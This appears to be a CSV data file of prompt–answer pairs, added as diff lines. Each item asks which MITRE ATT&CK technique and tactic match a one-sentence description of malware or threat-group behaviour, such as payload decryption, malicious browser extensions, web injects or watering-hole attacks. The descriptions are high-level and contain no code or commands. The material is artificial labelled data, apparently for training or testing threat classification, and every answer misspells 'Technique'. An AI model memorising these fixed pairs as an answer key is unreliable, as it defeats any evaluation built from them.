+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can decrypt password-protected executables.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can use a custom algorithm to decrypt strings used by the malware.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop can decrypt PowerShell scripts for execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can use base64 and AES ECB decryption prior to execution of downloaded modules.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton uses an encrypted file to store commands and configuration values.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can decrypt encrypted data strings prior to using them.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has decrypted and dropped the DCSrv payload to disk.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can use a custom parsing routine to decode the command codes and additional parameters from the C2 before executing them.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can deobfuscate and re-assemble code strings for execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RAPIDPULSE listens for specific HTTP query parameters in received communications. If specific parameters match, a hard-coded RC4 key is used to decrypt the HTTP query paremter hmacTime. This decrypts to a filename that is then open, read, encrypted with the same RC4 key, base64-encoded, written to standard out, then passed as a response to the HTTP request.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can decode encrypted strings to enable execution of commands and payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can decrypt strings using the victim's hostname as the key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can decrypt its payload via a XOR key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can extract its agent from the body of a malicious document.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi decrypts the configuration data using XOR with 25-character keys.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin decodes an embedded executable using base64 and decompresses it.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro uses the AES algorithm, bit shifts in a function called `rotate`, and an XOR cipher to decrypt resources required for persistence, process guarding, and file locking. It also performs this same function on encrypted stack strings and the `head` and `key` sections in the network packet structure used for C2 communications.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to decrypt and decompress its payload to enable code execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE can deobfuscate base64 encoded and RC4 encrypted C2 messages.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has scripts that are responsible for deobfuscating additional scripts.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STEADYPULSE can URL decode key/value pairs sent over C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can deobfuscate strings and files for execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can first decrypt with the RC4 algorithm using a hardcoded decryption key before decompressing.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has decrypted a binary blob to start execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon decrypts ciphertext using an XOR cipher and a base64-encoded string.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can extract and decrypt downloaded .zip files.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has decompressed data received from the C2 server.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot can decrypt data received from a C2 and save to a file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can decode and decrypt messages received from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape has decrypted the password of the C2 server with a simple byte by byte XOR. Siloscape also writes both an archive of Tor and the unzip binary to disk from data embedded within the payload using Visual Studio’s Resource Manager.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to download, unpack, and decrypt tar.gz files .","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader deobfuscates its code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can decode its second-stage PowerShell script prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can run upload to decrypt and upload files from storage.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can decode and decrypt exfiltrated data sent to C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has used a custom XOR algorithm to decrypt the payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Starloader decrypts and executes shellcode from a file called Stars.jps.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet decrypts resources that are loaded into memory and executed.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can deobfuscate packed binaries in memory.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to decrypt, load, and execute a DLL and its resources.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value ""0x35"".","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use a stream cipher to decrypt stings used by the malware.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has used XOR and Base64 to decode C2 data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot decodes the configuration data and modules.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can decrypt command parameters sent through C2 and use unpacking code to extract its packed executable.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to decode and decrypt downloaded files.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VaporRage can deobfuscate XOR-encoded shellcode prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer deobfuscates its strings and APIs once its executed.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE can decode, decrypt, and decompress data received in C2 HTTP `POST` requests.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can use XOR 0x45 to decrypt obfuscated code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear has the ability to decrypt its RC4 encrypted payload for execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can decompress scripts received from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can decode and decrypt data received from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to decrypt strings using hard-coded AES keys.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows dropper can decrypt and decompresses a data blob.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can deobfuscate Base64-encoded strings and scripts.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH decrypts downloaded files before execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy decodes its secondary payload and writes it to the victim’s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT shellcode decrypts and decompresses its RC4-encrypted payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda decrypts strings in the code during the execution process.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has used a XOR key to decrypt strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: certutil has been used to decode binaries hidden inside certificate files as Base64 information.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has decrypted and loaded the gh0st RAT DLL into memory, once the initial dropper executable is launched.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can decrypt and load other modules.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has decoded strings from the C2 server before executing commands.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.,"Tecnique: T1176 Browser Extensions, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can install malicious browser extensions that are used to hijack user searches.,"Tecnique: T1176 Browser Extensions, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use malicious browser extensions to steal cookies and other user information.,"Tecnique: T1176 Browser Extensions, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu utilizes malicious Google Chrome browser extensions to steal financial data.,"Tecnique: T1176 Browser Extensions, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can install malicious Safari browser extensions to serve ads.,"Tecnique: T1176 Browser Extensions, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to use form-grabbing to extract data from web data forms.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has captured credentials when a user performs login through a SSL session.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.","Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.","Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. IcedID can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use advanced web injects to steal web banking credentials.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).,"Tecnique: T1185 Browser Session Hijacking, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.,"Tecnique: T1187 Forced Authentication, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.,"Tecnique: T1187 Forced Authentication, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.,"Tecnique: T1187 Forced Authentication, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0010, UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has compromised targets via strategic web compromise utilizing custom exploit kits. APT28 used reflected cross-site scripting (XSS) against government websites to redirect users to phishing webpages.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has infected victims by tricking them into visiting compromised watering hole websites.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has conducted watering holes schemes to gain initial access to victims.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used watering hole attacks to gain access.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal leveraged a watering hole to serve up malicious code.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has performed watering hole attacks.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer has infected victims using watering holes.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has infected victims using watering holes.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has distributed Machete through a fake blog website.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has conducted watering-hole attacks through media and magazine websites.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has used drive-by downloads for initial infection, often using fake browser updates as a lure.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has used watering hole attacks to deliver malicious versions of legitimate installers.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used watering holes to deliver files with exploits to initial victims.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network Yandex.Direct.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has extensively used strategic web compromises to target victims.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has used websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.","Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has infected victims using watering holes.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has distributed Windows malware via drive-by downloads.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used compromised websites to register custom URL schemes on a remote system.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit spread through watering holes on popular sites by injecting JavaScript into the HTML body or a .js file.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has been spread through malicious advertisements on websites.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer.,"Tecnique: T1189 Drive-by Compromise, Tactic: TA0001 Initial Access"
